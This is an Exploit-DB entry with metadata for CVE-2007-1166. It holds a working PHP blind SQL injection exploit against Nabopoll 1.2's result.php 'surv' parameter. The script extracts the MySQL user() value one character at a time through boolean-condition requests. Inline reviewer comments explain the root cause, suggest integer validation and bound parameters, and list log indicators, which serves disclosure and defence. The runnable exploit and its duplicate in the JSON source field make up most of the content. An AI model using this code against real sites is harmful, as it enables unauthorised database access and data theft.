ID EDB-ID:3355
Type exploitdb
Reporter s0cratex
Modified 2007-02-21T00:00:00
Description
Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit. CVE-2007-1166. Webapps exploit for php platform
<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
#
# Reviewer summary (defensive reading):
#   Proof of concept for CVE-2007-1166. It appends a boolean condition to the
#   `surv` query parameter of result.php and infers the value of MySQL user()
#   one character at a time, from whether a response line contains the string
#   "power".
#   Root cause, per the CVE description, is SQL injection through `surv`
#   (CWE-89). result.php is not shown here; since the survey id used below is
#   numeric, the usual remedy is to accept digits only (integer validation or
#   cast) and to bind the value as a query parameter instead of concatenating
#   it into the statement.
#   Log indicators visible in this script: bursts of HTTP/1.0 GETs with no Host
#   header to result.php whose `surv` value contains `/**/`, `SELECT`,
#   `ASCII(SUBSTRING(` and a trailing unterminated `/*`, with consecutive
#   requests differing only in two integers.
// Suppress all PHP diagnostics; the fsockopen() result below is never checked.
error_reporting(0);
// Remove the execution time limit, since the loops below issue many requests.
ini_set("max_execution_time",0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...
echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
// $j is the 1-based character position passed to SUBSTRING(); $user accumulates matched bytes.
$j = 1; $user = "";
// Loop until a NUL byte has been appended to $user.
// NOTE(review): presumably reached once $j passes the end of user(), where
// ASCII(SUBSTRING(...)) would evaluate to 0 in MySQL — confirm.
while(!strstr($user,chr(0))){
// Try candidate byte values 0..254 for position $j.
for($x=0;$x<255;$x++){
// Boolean test appended after the survey id. `/**/` stands in for spaces; the
// trailing `/*` opens a comment, presumably to discard the rest of the
// original query (result.php is not shown).
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
// One new TCP connection per guess.
$cnx = fsockopen($srv,$port);
// Bare HTTP/1.0 request line; no Host or other headers are sent.
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
// Oracle: a response line containing "power" is treated as "condition true".
// NOTE(review): likely a footer string that is only rendered when the survey
// query returns a row — confirm against the application.
// `break` leaves only this read loop; the for loop goes on testing the
// remaining values, so every character position costs 255 requests.
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
// NOTE(review): unreachable as written — inside the loop $x is always below
// 255. Against a target that never returns the marker the script therefore
// does not abort and keeps sending requests, which shows up as sustained
// request volume in access logs.
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>
# milw0rm.com [2007-02-21]
{"id": "EDB-ID:3355", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Nabopoll 1.2 result.php surv Remote Blind SQL Injection Exploit", "description": "Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit. CVE-2007-1166. Webapps exploit for php platform", "published": "2007-02-21T00:00:00", "modified": "2007-02-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3355/", "reporter": "s0cratex", "references": [], "cvelist": ["CVE-2007-1166"], "lastseen": "2016-01-31T18:17:34", "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-01-31T18:17:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1166"]}, {"type": "osvdb", "idList": ["OSVDB:33753"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7271"]}], "modified": "2016-01-31T18:17:34", "rev": 2}, "vulnersScore": 7.5}, "sourceHref": "https://www.exploit-db.com/download/3355/", "sourceData": "<?\n# Nabopoll Blind SQL Injection P0C Exploit\n# Download: www.nabocorp.com/nabopoll/\n# coded by s0cratex\n# Contact: s0cratex@hotmail.com\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\n\n// just change the default values...\n$srv = \"localhost\"; $path = \"/poll\"; $port = 80;\n$survey = \"8\"; //you can verify the number entering in the site and viewing the results...\n\necho \"==================================================\\n\";\necho \"Nabopoll SQL Injection -- Proof of Concept Exploit\\n\";\necho \"--------------------------------------------------\\n\\n\";\necho \" -- MySQL User: \";\n$j = 1; $user = \"\";\nwhile(!strstr($user,chr(0))){\nfor($x=0;$x<255;$x++){\n$xpl = \"/result.php?surv=\".$survey.\"/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),\".$j.\",1))=\".$x.\"),1,0)))/*\";\n$cnx = fsockopen($srv,$port);\nfwrite($cnx,\"GET \".$path.$xpl.\" HTTP/1.0\\r\\n\\r\\n\");\nwhile(!feof($cnx)){ 
if(ereg(\"power\",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\");\n}\n}\n$j++;\n}\necho \"\\n\";\n?>\n\n# milw0rm.com [2007-02-21]\n", "osvdbidlist": ["33753"]}
{"cve": [{"lastseen": "2020-10-03T11:45:50", "description": "SQL injection vulnerability in result.php in Nabopoll 1.2 allows remote attackers to execute arbitrary SQL commands via the surv parameter.", "edition": 3, "cvss3": {}, "published": "2007-03-02T21:18:00", "title": "CVE-2007-1166", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1166"], "modified": "2018-10-16T16:37:00", "cpe": ["cpe:/a:nabocorp:nabopoll:1.2"], "id": "CVE-2007-1166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nabocorp:nabopoll:1.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-1166"], "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0392.html\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001379.html\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001380.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3355\n[CVE-2007-1166](https://vulners.com/cve/CVE-2007-1166)\nBugtraq ID: 22649\n", "edition": 1, "modified": "2007-02-21T07:06:23", "published": "2007-02-21T07:06:23", "href": "https://vulners.com/osvdb/OSVDB:33753", "id": "OSVDB:33753", "title": "Nabopoll result.php surv Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-1053", "CVE-2007-1061", "CVE-2007-1032", "CVE-2007-1166", "CVE-2007-1035", "CVE-2007-1033", "CVE-2007-1028", "CVE-2007-1161"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-02-21T00:00:00", "published": "2007-02-21T00:00:00", "id": "SECURITYVULNS:VULN:7271", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7271", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}